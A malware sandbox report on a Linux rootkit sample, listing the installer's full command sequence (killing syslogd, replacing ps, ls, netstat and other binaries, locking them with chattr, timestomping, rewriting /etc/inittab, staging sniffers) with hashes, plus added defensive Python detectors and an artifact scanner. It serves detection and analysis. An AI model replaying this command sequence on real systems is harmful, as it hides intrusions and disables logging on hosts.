Malware Analysis Report

2024-10-16 06:10

Sample ID 240715-29pykawhmc
Target 4bd599176fbaab489642f3fafb083862_JaffaCakes118
SHA256 c7d3a16ba29abcf5261b66af753f44124fcb3a303059f7cee04334983a3b6d16
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

c7d3a16ba29abcf5261b66af753f44124fcb3a303059f7cee04334983a3b6d16

Threat Level: Shows suspicious behavior

The file 4bd599176fbaab489642f3fafb083862_JaffaCakes118 was found to show suspicious behavior. The behavioral runs below record a Linux rootkit install: the sample unpacks bundled archives (bin.tgz, conf.tgz, lib.tgz, utilz.tgz, sshd.tgz), kills syslogd, replaces ps, ls, netstat, ifconfig, top, find, pstree and md5sum with its own copies while keeping the originals under /usr/lib/libsh/.backup, locks the replacements and its own files with chattr +isa, copies timestamps from /bin/ls onto everything it drops (touch -acmr), rewrites /etc/inittab so that ttyload is started by init, launches /sbin/ttyload and /sbin/ttymon, and stages further tools (shsniff, shp, shsb, hide) under /usr/lib/libsh. The antivm and "Checks CPU configuration" hits come from cat /proc/cpuinfo | grep bogomips, which here appears to feed a host-information record (/tmp/info_tmp, together with hostname, uname, ifconfig and /etc/debian_version output) rather than a sandbox-evasion check.

Malicious Activity Summary

antivm

Executes dropped EXE

Enumerates running processes

Write file to user bin folder

Attempts to change immutable files

Checks CPU configuration

Reads CPU attributes

Reads runtime system information

Writes file to tmp directory
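The signature names above are the sandbox's own labels. As an added example (not part of this report and not the sandbox's signature code), the Python below turns the behaviour recorded in the Processes sections into checks that run over process-execution telemetry, one command line per event as auditd, eBPF or EDR tooling would supply. It flags chattr changes to the immutable/append-only flags, the swap sequence chattr -isa X, mv over X, chattr +isa X on a watched binary, timestomping with touch -r, a move over /etc/inittab, and killall of syslogd. The sample events are constructed from command lines in this report; WATCHED_BINARIES and the rule names are this example's own choices.

```python
"""Turn the installer behaviour in this report into checks over process-execution
telemetry. Added example; not the sandbox's own signature code."""
import os
import shlex

# Binaries this installer swaps for its own copies (Processes section of the report).
# Extend with whatever your estate treats as integrity-critical.
WATCHED_BINARIES = {
    "/bin/ps", "/bin/ls", "/bin/netstat", "/sbin/ifconfig", "/usr/bin/find",
    "/usr/bin/top", "/usr/bin/pstree", "/usr/bin/md5sum", "/usr/sbin/lsof",
    "/sbin/syslogd", "/usr/bin/slocate", "/usr/bin/dir",
}

# Constructed sample events: a subset of the command lines from this report, in
# the order they ran, plus two benign lines the rules must ignore.
SAMPLE_EVENTS = [
    "killall -9 syslogd",
    "touch -acmr /bin/ls /etc/sh.conf",
    "chattr +isa /etc/sh.conf",
    "touch -acmr /bin/ps ps",
    "chattr -isa /bin/ps",
    "cp /bin/ps /usr/lib/libsh/.backup",
    "mv -f ps /bin/ps",
    "chattr +isa /bin/ps",
    "chattr -isa /sbin/ifconfig",
    "cp /sbin/ifconfig /usr/lib/libsh/.backup",
    "mv -f ifconfig /sbin/ifconfig",
    "chattr +isa /sbin/ifconfig",
    "touch -amcr /etc/inittab /tmp/.init1",
    "mv -f /tmp/.init1 /etc/inittab",
    "ps aux",
    "grep ttyload /etc/inittab",
]


def _argv(cmdline):
    """Tokenise one command line; fall back to a plain split on unbalanced quotes."""
    try:
        return shlex.split(cmdline)
    except ValueError:
        return cmdline.split()


def detect(cmdlines):
    """Return [(rule, detail), ...] for an ordered sequence of execve command lines.

    immutable_flag_change  chattr setting or clearing the i (immutable) or a (append-only) flag
    trojanized_binary      chattr -i/-a on a watched binary, mv over it, then chattr +i/+a again
    timestomp              touch -r <reference> <target>: atime/mtime copied from another file
    inittab_replaced       mv over /etc/inittab (init-spawned persistence)
    syslog_killed          killall of syslogd (logging stopped before the install)
    """
    alerts = []
    stage = {}  # watched path -> "unlocked" | "replaced" while a swap is in progress
    for raw in cmdlines:
        argv = _argv(raw)
        if not argv:
            continue
        prog, args = os.path.basename(argv[0]), argv[1:]

        if prog == "chattr" and len(args) >= 2:
            flags, targets = args[0], args[1:]
            if flags and flags[0] in "+-" and ("i" in flags or "a" in flags):
                for target in targets:
                    alerts.append(("immutable_flag_change", raw))
                    if flags[0] == "-" and target in WATCHED_BINARIES:
                        stage[target] = "unlocked"
                    elif flags[0] == "+" and stage.pop(target, None) == "replaced":
                        alerts.append(("trojanized_binary", target))

        elif prog == "mv":
            paths = [a for a in args if not a.startswith("-")]
            if len(paths) >= 2:
                dst = paths[-1]
                if stage.get(dst) == "unlocked":
                    stage[dst] = "replaced"
                if dst == "/etc/inittab":
                    alerts.append(("inittab_replaced", raw))

        elif prog == "touch":
            opts = [a for a in args if a.startswith("-")]
            paths = [a for a in args if not a.startswith("-")]
            short_ref = any("r" in o for o in opts if not o.startswith("--"))
            long_ref = any(o.startswith("--reference") for o in opts)
            if (short_ref and len(paths) >= 2) or (long_ref and paths):
                alerts.append(("timestomp", raw))

        elif prog == "killall" and "syslogd" in args:
            alerts.append(("syslog_killed", raw))
    return alerts


def summarize(alerts):
    """Count alerts per rule."""
    counts = {}
    for rule, _ in alerts:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:24} {detail}")
```

The swap rule is stateful on purpose: a lone chattr +i on a binary is common in hardening scripts, but unlocking a system binary, moving a new file over it and locking it again within one session is the pattern this sample shows for every replaced tool. Run detect over events grouped per host and per session so the state does not leak between unrelated processes.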

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-15 23:17

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-15 23:17

Reported

2024-07-15 23:19

Platform

debian9-armhf-20240611-en

Max time kernel

24s

Max time network

25s

Command Line

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /usr/sbin/ttyload /usr/sbin/ttyload N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/hostname N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Enumerates running processes

Write file to user bin folder

Description Indicator Process Target
File opened for modification /usr/sbin/ttyload /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/41/stat /usr/bin/killall N/A
File opened for reading /proc/274/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/19/cmdline /bin/pidof N/A
File opened for reading /proc/148/stat /usr/bin/killall N/A
File opened for reading /proc/633/stat /usr/bin/killall N/A
File opened for reading /proc/587/stat /bin/pidof N/A
File opened for reading /proc/625/cmdline /bin/pidof N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/109/stat /usr/bin/killall N/A
File opened for reading /proc/162/stat /usr/bin/killall N/A
File opened for reading /proc/139/cmdline /bin/pidof N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/303/cmdline /bin/pidof N/A
File opened for reading /proc/587/status /bin/ps N/A
File opened for reading /proc/303/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/633/cmdline /bin/pidof N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/23/cmdline /bin/ps N/A
File opened for reading /proc/299/stat /usr/bin/killall N/A
File opened for reading /proc/136/cmdline /usr/bin/killall N/A
File opened for reading /proc/277/stat /usr/bin/killall N/A
File opened for reading /proc/275/stat /usr/bin/killall N/A
File opened for reading /proc/588/stat /bin/ps N/A
File opened for reading /proc/98/stat /usr/bin/killall N/A
File opened for reading /proc/139/stat /usr/bin/killall N/A
File opened for reading /proc/633/stat /usr/bin/killall N/A
File opened for reading /proc/587/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/633/stat /usr/bin/killall N/A
File opened for reading /proc/588/stat /usr/bin/killall N/A
File opened for reading /proc/635/stat /usr/bin/killall N/A
File opened for reading /proc/274/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/43/cmdline /bin/pidof N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/585/stat /usr/bin/killall N/A
File opened for reading /proc/109/cmdline /usr/bin/killall N/A
File opened for reading /proc/762/stat /bin/pidof N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/109/stat /usr/bin/killall N/A
File opened for reading /proc/148/stat /usr/bin/killall N/A
File opened for reading /proc/140/stat /usr/bin/killall N/A
File opened for reading /proc/278/stat /usr/bin/killall N/A
File opened for reading /proc/630/stat /usr/bin/killall N/A
File opened for reading /proc/314/cmdline /bin/ps N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/633/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/23/status /bin/ps N/A
File opened for reading /proc/635/stat /usr/bin/killall N/A
File opened for reading /proc/98/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/274/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /bin/pidof N/A
File opened for reading /proc/633/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/136/stat /usr/bin/killall N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/conf/hosts.h /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init1 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.init2 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.shmd5 /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.procs /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/.stats /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/info_tmp /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A
File opened for modification /tmp/bin/.sh/sshd_config /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 N/A

Processes

/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118

[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]

/usr/bin/whoami

[whoami]

/bin/tar

[tar zxf ./bin.tgz]

/bin/tar

[tar zxf ./conf.tgz]

/bin/tar

[tar zxf ./lib.tgz]

/bin/tar

[tar zxf ./utilz.tgz]

/bin/tar

[tar zxf ./sshd.tgz]

/bin/rm

[rm -rf ./sshd.tgz]

/bin/rm

[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]

/bin/sleep

[sleep 2]

/usr/bin/killall

[killall -9 syslogd]

/bin/date

[date +%S]

/bin/sleep

[sleep 2]

/bin/hostname

[hostname -f]

/bin/grep

[grep -v ^# /etc/syslog.conf]

/bin/grep

[grep -v ^$]

/bin/grep

[grep @]

/usr/bin/cut

[cut -d @ -f 2]

/bin/uname

[uname -n]

/bin/mv

[mv lib/libproc.a /lib/]

/bin/mv

[mv lib/libproc.so.2.0.6 /lib/]

/sbin/ldconfig

[/sbin/ldconfig]

/usr/bin/md5sum

[md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /etc/sh.conf]

/bin/chown

[chown -f root:root /etc/sh.conf]

/usr/bin/chattr

[chattr +isa /etc/sh.conf]

/bin/rm

[rm -rf /tmp/bin/.sh/shdcf2]

/bin/mv

[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]

/bin/mv

[mv /tmp/conf/lidps1.so /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/lidps1.so]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/conf/*]

/bin/mv

[mv /tmp/conf/* /usr/include/]

/bin/mkdir

[mkdir /lib/libsh.so]

/usr/bin/touch

[touch -acmr /bin/ls /lib/libsh.so]

/bin/mkdir

[mkdir /usr/lib/libsh]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh]

/bin/mv

[mv .sh/* /lib/libsh.so/]

/bin/mv

[mv .sh/.bashrc /usr/lib/libsh]

/bin/mv

[mv /lib/libsh.so/sshd /sbin/ttyload]

/bin/chmod

[chmod a+xr /sbin/ttyload]

/bin/chmod

[chmod o-w /sbin/ttyload]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttyload]

/usr/bin/chattr

[chattr +isa /sbin/ttyload]

/bin/pidof

[pidof ttyload]

/bin/mv

[mv /tmp/bin/ttymon /sbin/ttymon]

/bin/chmod

[chmod a+xr /sbin/ttymon]

/usr/bin/touch

[touch -acmr /bin/ls /sbin/ttymon]

/usr/bin/chattr

[chattr +isa /sbin/ttymon]

/bin/pidof

[pidof ttymon]

/bin/cp

[cp /bin/bash /lib/libsh.so]

/usr/bin/chattr

[chattr -isa /etc/inittab]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v ttyload]

/bin/grep

[grep -v getty]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep getty]

/bin/cat

[cat /tmp/.init2]

/usr/bin/touch

[touch -acmr /bin/ls /usr/sbin/ttyload]

/bin/chmod

[chmod +x /usr/sbin/ttyload]

/usr/bin/chattr

[chattr +isa /usr/sbin/ttyload]

/usr/sbin/ttyload

[/usr/sbin/ttyload]

/sbin/ttyload

[/sbin/ttyload -q]

/sbin/ttymon

[/sbin/ttymon]

/usr/bin/touch

[touch -amcr /etc/inittab /tmp/.init1]

/bin/mv

[mv -f /tmp/.init1 /etc/inittab]

/bin/rm

[rm -rf /tmp/.init2]

/bin/grep

[grep ttyload /etc/inittab]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ps]

/usr/bin/md5sum

[/usr/bin/md5sum /bin/ls]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/find]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/top]

/usr/bin/md5sum

[/usr/bin/md5sum /usr/bin/md5sum]

/tmp/encrypt

[./encrypt -e .shmd5 /dev/srd0]

/usr/bin/touch

[touch -acmr /bin/ls /dev/srd0]

/usr/bin/chattr

[chattr a+r /dev/srd0]

/bin/chown

[chown -f root:root /dev/srd0]

/bin/rm

[rm -rf .shmd5]

/usr/bin/touch

[touch -acmr /sbin/ifconfig ifconfig]

/usr/bin/touch

[touch -acmr /bin/ps ps]

/usr/bin/touch

[touch -acmr /bin/ls ls]

/usr/bin/touch

[touch -acmr /bin/netstat netstat]

/usr/bin/touch

[touch -acmr /usr/bin/find find]

/usr/bin/touch

[touch -acmr /usr/bin/top top]

/usr/bin/touch

[touch -acmr /usr/sbin/lsof lsof]

/usr/bin/touch

[touch -acmr /sbin/syslogd syslogd]

/usr/bin/touch

[touch -acmr /usr/bin/slocate slocate]

/usr/bin/touch

[touch -acmr /usr/bin/dir dir]

/usr/bin/touch

[touch -acmr /usr/bin/md5sum md5sum]

/usr/bin/touch

[touch -acmr /usr/bin/pstree pstree]

/bin/mkdir

[mkdir /usr/lib/libsh/.backup]

/usr/bin/chattr

[chattr -isa /bin/ps]

/bin/cp

[cp /bin/ps /usr/lib/libsh/.backup]

/bin/mv

[mv -f ps /bin/ps]

/usr/bin/chattr

[chattr +isa /bin/ps]

/usr/bin/chattr

[chattr -isa /sbin/ifconfig]

/bin/cp

[cp /sbin/ifconfig /usr/lib/libsh/.backup]

/bin/mv

[mv -f ifconfig /sbin/ifconfig]

/usr/bin/chattr

[chattr +isa /sbin/ifconfig]

/usr/bin/chattr

[chattr -isa /bin/netstat]

/bin/cp

[cp /bin/netstat /usr/lib/libsh/.backup]

/bin/mv

[mv -f netstat /bin/netstat]

/usr/bin/chattr

[chattr +isa /bin/netstat]

/usr/bin/chattr

[chattr -isa /usr/bin/top]

/bin/cp

[cp /usr/bin/top /usr/lib/libsh/.backup]

/bin/mv

[mv -f top /usr/bin/top]

/usr/bin/chattr

[chattr +isa /usr/bin/top]

/usr/bin/chattr

[chattr -isa /bin/ls]

/bin/cp

[cp /bin/ls /usr/lib/libsh/.backup]

/bin/mv

[mv -f ls /bin/ls]

/usr/bin/chattr

[chattr +isa /bin/ls]

/usr/bin/chattr

[chattr -isa /usr/bin/find]

/bin/cp

[cp /usr/bin/find /usr/lib/libsh/.backup]

/bin/mv

[mv -f find /usr/bin/find]

/usr/bin/chattr

[chattr +isa /usr/bin/find]

/usr/bin/chattr

[chattr -isa /usr/bin/pstree]

/bin/cp

[cp /usr/bin/pstree /usr/lib/libsh/.backup]

/bin/mv

[mv -f pstree /usr/bin/pstree]

/usr/bin/chattr

[chattr +isa /usr/bin/pstree]

/usr/bin/chattr

[chattr -isa /usr/bin/md5sum]

/bin/cp

[cp /usr/bin/md5sum /usr/lib/libsh/.backup]

/bin/mv

[mv -f md5sum /usr/bin/md5sum]

/usr/bin/chattr

[chattr +isa /usr/bin/md5sum]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz]

/usr/bin/touch

[touch -acmr /bin/ls /tmp/utilz/*]

/bin/mv

[mv /tmp/utilz /usr/lib/libsh/]

/bin/mkdir

[mkdir /usr/lib/libsh/.sniff]

/bin/mv

[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]

/bin/mv

[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]

/bin/mv

[mv /tmp/bin/shsb /usr/lib/libsh/shsb]

/bin/mv

[mv /tmp/bin/hide /usr/lib/libsh/hide]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/shsb]

/usr/bin/touch

[touch -acmr /bin/ls /usr/lib/libsh/hide]

/bin/chmod

[chmod +x /usr/lib/libsh/.sniff/*]

/bin/chmod

[chmod +x /usr/lib/libsh/shsb]

/bin/chmod

[chmod +x /usr/lib/libsh/hide]

/bin/ps

[ps aux]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep named]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep smbd]

/bin/cat

[cat /tmp/.procs]

/bin/grep

[grep rpc.statd]

/bin/rm

[rm -rf /tmp/.procs]

/bin/cat

[cat /tmp/.stats]

/bin/grep

[grep 443]

/bin/grep

[grep http]

/bin/rm

[rm -rf /tmp/.stats]

/bin/mkdir

[mkdir /usr/lib/libsh/.owned]

/usr/bin/chattr

[chattr +isa /usr/lib/libsh]

/usr/bin/chattr

[chattr +isa /lib/libsh.so]

/usr/bin/killall

[killall -9 -q nscd]

/usr/bin/killall

[killall -9 -q xntps]

/usr/bin/killall

[killall -9 -q mountd]

/usr/bin/killall

[killall -9 -q mserv]

/usr/bin/killall

[killall -9 -q psybnc]

/usr/bin/killall

[killall -9 -q t0rns]

/usr/bin/killall

[killall -9 -q linsniffer]

/usr/bin/killall

[killall -9 -q sniffer]

/usr/bin/killall

[killall -9 -q lpsched]

/usr/bin/killall

[killall -9 -q sniff]

/usr/bin/killall

[killall -9 -q sn1f]

/usr/bin/killall

[killall -9 -q sshd2]

/usr/bin/killall

[killall -9 -q xsf]

/usr/bin/killall

[killall -9 -q xchk]

/usr/bin/killall

[killall -9 -q ssh2d]

/sbin/ifconfig

[/sbin/ifconfig eth0]

/bin/grep

[grep inet addr:]

/usr/bin/awk

[awk -F {print $2} ]

/usr/bin/cut

[cut -c6-]

/bin/hostname

[hostname -f]

/bin/uname

[uname -a]

/usr/bin/awk

[awk { print $11 }]

/bin/cat

[cat /tmp/info_tmp]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/usr/bin/awk

[awk {print $3}]

/bin/hostname

[hostname -i]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep eth]

/usr/bin/wc

[wc -l]

/usr/bin/head

[head -1 /etc/debian_version]

/bin/rm

[rm -rf /tmp/info_tmp]

/bin/date

[date +%S]

/usr/bin/expr

[expr 33 - 13]

/sbin/iptables

[/sbin/iptables -L input]

/usr/bin/head

[head -5]

/sbin/syslogd

[/sbin/syslogd -m 0]

/bin/rm

[rm -rf ../shv5*]
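The command lines above leave a fixed set of on-disk artifacts. As an added example (not part of this report), the Python below checks a root directory for them: the dropped paths, a ttyload entry in /etc/inittab, replaced binaries that no longer match the backup copy the installer itself kept under /usr/lib/libsh/.backup, and the i/a attributes on system binaries via lsattr where the filesystem supports them. Because the sample replaces ps, ls, find and md5sum on the host, run it from a trusted boot environment or against a mounted image rather than trusting the compromised system's own tools; the paths and rule names are this example's own, and build_demo_root is a constructed fixture with placeholder file contents.

```python
"""Look for the on-disk artifacts the installer in this report leaves behind.
Added example, not part of the report. Point it at '/' on a live host or at the
mount point of an offline image; findings are returned, not just printed."""
import hashlib
import os
import shutil
import subprocess
import sys
import tempfile

# Paths created or moved into place by the command lines in this report (root-relative).
ARTIFACT_PATHS = [
    "etc/sh.conf", "lib/lidps1.so", "lib/libsh.so", "usr/lib/libsh",
    "usr/lib/libsh/.backup", "usr/lib/libsh/.sniff", "sbin/ttyload",
    "sbin/ttymon", "usr/sbin/ttyload", "dev/srd0", "usr/include/hosts.h",
]
# Binaries the installer replaced; it kept the originals under BACKUP_DIR.
REPLACED_BINARIES = [
    "bin/ps", "sbin/ifconfig", "bin/netstat", "usr/bin/top", "bin/ls",
    "usr/bin/find", "usr/bin/pstree", "usr/bin/md5sum",
]
BACKUP_DIR = "usr/lib/libsh/.backup"


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def _immutable_or_append_only(path):
    """True if lsattr shows the i or a flag. False when lsattr is missing or the
    filesystem does not support attributes (tmpfs, overlayfs), so treat False as
    'unknown', not 'clean'."""
    if shutil.which("lsattr") is None:
        return False
    try:
        res = subprocess.run(["lsattr", "-d", path], capture_output=True,
                             text=True, timeout=5)
    except (OSError, subprocess.SubprocessError):
        return False
    if res.returncode != 0 or not res.stdout.strip():
        return False
    flags = res.stdout.split()[0]
    return "i" in flags or "a" in flags


def scan(root="/"):
    """Return [(finding, path), ...] for rootkit artifacts under root."""
    findings = []
    for rel in ARTIFACT_PATHS:
        p = os.path.join(root, rel)
        if os.path.lexists(p):
            findings.append(("artifact_present", p))

    inittab = os.path.join(root, "etc/inittab")
    if os.path.isfile(inittab):
        with open(inittab, errors="replace") as f:
            if "ttyload" in f.read():
                findings.append(("inittab_ttyload_entry", inittab))

    for rel in REPLACED_BINARIES:
        live = os.path.join(root, rel)
        backup = os.path.join(root, BACKUP_DIR, os.path.basename(rel))
        if not os.path.isfile(live):
            continue
        if os.path.isfile(backup) and _sha256(live) != _sha256(backup):
            findings.append(("binary_differs_from_backup", live))
        if _immutable_or_append_only(live):
            findings.append(("immutable_system_binary", live))
    return findings


def build_demo_root():
    """Constructed fixture: a temp tree with a few of the artifacts above.
    File contents are placeholders; the report does not show the real bytes."""
    root = tempfile.mkdtemp(prefix="rootkit-scan-demo-")
    files = {
        "etc/inittab": b"id:2:initdefault:\n# placeholder entry mentioning ttyload\n",
        "etc/sh.conf": b"placeholder",
        "usr/sbin/ttyload": b"placeholder",
        "bin/ps": b"replaced-ps",
        "usr/lib/libsh/.backup/ps": b"original-ps",
        "bin/ls": b"untouched-ls",
        "usr/lib/libsh/.backup/ls": b"untouched-ls",
    }
    for rel, data in files.items():
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as f:
            f.write(data)
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_demo_root()
    for finding, path in scan(target):
        print(f"{finding:28} {path}")
```

The backup comparison only works because this installer keeps the originals; on a host where the backups were removed, compare the live binaries against package metadata instead (dpkg --verify on Debian) using a copy of the package tools from a trusted medium, since /usr/bin/md5sum was among the replaced files and the hashes the installer recorded went into /dev/srd0 rather than anywhere trustworthy.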

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-armhf-20240611-en-0 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-0 udp
US 1.1.1.1:53 debian9-armhf-20240611-en-0 udp

Files

/var/cache/ldconfig/aux-cache~

MD5 a6bf94354cfeba3dbcd11f945c9675c4
SHA1 a27339c994e7b65ef52ae9dc38a625b8d2241bf6
SHA256 13eaf12dd225106747bd57c2bdc230e109038d83a2feaff34ab1148dbf9d9c28
SHA512 0e495be99718139c7a8bde0b4f73fb995465c31d74ecc6ec696d7e8e17f0f6767950f94e6d5962e1541902ef93b6c35e4d90bdae38eb13327f1dfb830188a1e7

/lib/libsh.so/bash

MD5 c119e30e6cf65d40abec2ebdc4f1e9cb
SHA1 67fd5fdf3161a0c086932074844a8bbf444b8911
SHA256 6b66d1462c569b1fd6de35d4a4efc7dfbd8bfe59a20c9a17b506ac468abf098b
SHA512 2d8e1a6820e206e43c0449bbe4b613d19d63853270b3d0bdc5be12d4bcab89dcd4f5def8a81126d51984a9e8169526d1b44996a2c0a18bfb1d764040c865fe89

/tmp/.init1

MD5 ba6ed6a3d425270d5374b0c2b54b3008
SHA1 58635a2e5fa938e55f777cb55a6df5fe44f6b4ec
SHA256 91c48fb19d87c95033df44d44e58474ab5e2a7176d231c11bb5e45c7d52fa359
SHA512 6f2ecc0fe867ec1cc575dc8cbba8566ac32dea4252b355f4267afb18d15dd759baecac3d8b74656a6008b7d20be3033ee4650f8b9cece8c2eb2466dc6fcecd0c

/tmp/.init1

MD5 0dae4739f83623a59236ecfabe00007b
SHA1 4b2b361ba9cf76213d2c4d6ba67e80099405f810
SHA256 513dfa0b7341549c6141df2ebdf1eedf72f1904d47725a17213b3bcb80916ac0
SHA512 12ab203d1434f29cf4b5f81d72a0790d9ddacd20df5d71e2a0d429b2bc8c80cff5c4a4c1332452deb9d84817088a1223f55ef2411f0605cfbe00eb2fe8aa1d74

/tmp/.init1

MD5 21df30feebe94d25ce99e861e3642895
SHA1 3624439d7e9ac4463f83f1658205367ef27a2234
SHA256 d3bfdb3e0f63a093f8e9bff6925ddc52429fe09fe4de521add28b373d44fe0f5
SHA512 26fbc52d5c2984a74673397e6edce3bf8a14e4d52a1abc7ffdfbf1bae9768b2583512632625d01bac896c623b0ec10fa24f6aa3c54ec2a70450b02d9bb37cecb

/tmp/.init1

MD5 74e8461d4c9dd715082f15ef51e3ecac
SHA1 0504be0510ac79c4f7c8d5477032408f9b63a651
SHA256 9fff95a586ab017f278fbf2f579d424e29164b5fae02f509176b9a600c4091de
SHA512 0682c5966466f49b1f53b872e5f10a4264f11a65f198f8e780365e6c683899815f90613cf8cd900d7b8d47247c343ab6002183a405313ac07fe026a2f634e02c

/tmp/.init1

MD5 8c053b4b674ebfcf6d38503608c5c8db
SHA1 9927d232e5bb15e3b6bbe461e0041d74649b963a
SHA256 6bdd745ccb67873f8e05c871ea6f153bb4daa683d7873e22c93fa716f53f61dc
SHA512 35320ff6eed384649f02262a46bf9fdabdcf1f9808738b7c6af3fea01a1b54c963d038c984c3d794445030632ab1ae38c8d6bbf319a362233a40ac9314a55222

/usr/sbin/ttyload

MD5 b46702355aecfc0bd14c525655eccb8b
SHA1 85ae2258fdf63f04130470356e4d0ba13cce49b4
SHA256 d4fe551995b5a5c5c71656ad1bf102c790f0a8a8415e1331ee9948e451a23db7
SHA512 db411c4f553c0eefd8672bf395679d48fe7dd9ad467d2ee5e738dd62815b2091c191c32db87bf88ae1aad3689a020c2e565091e1086f5fd1733c75847091f151

/usr/sbin/ttyload

MD5 53e75bf7964b0fb15cbe3028a151ed65
SHA1 116589e3b65166f73be2c6e8bb3b09c07641a762
SHA256 550618b776401129e1bf6000bc28a7891ab0a6431bac3382be1ee1a585282805
SHA512 ec2f45bc08e02e16db6db32bb71daff158c4044ed7268b696a62bf0efe9de59c331d6afb0b9101b5686e41cc701c491d75b0617c18bb68fb3393bea2ba702316

/tmp/.shmd5

MD5 f0a2dccf108969338c829700d2dedbea
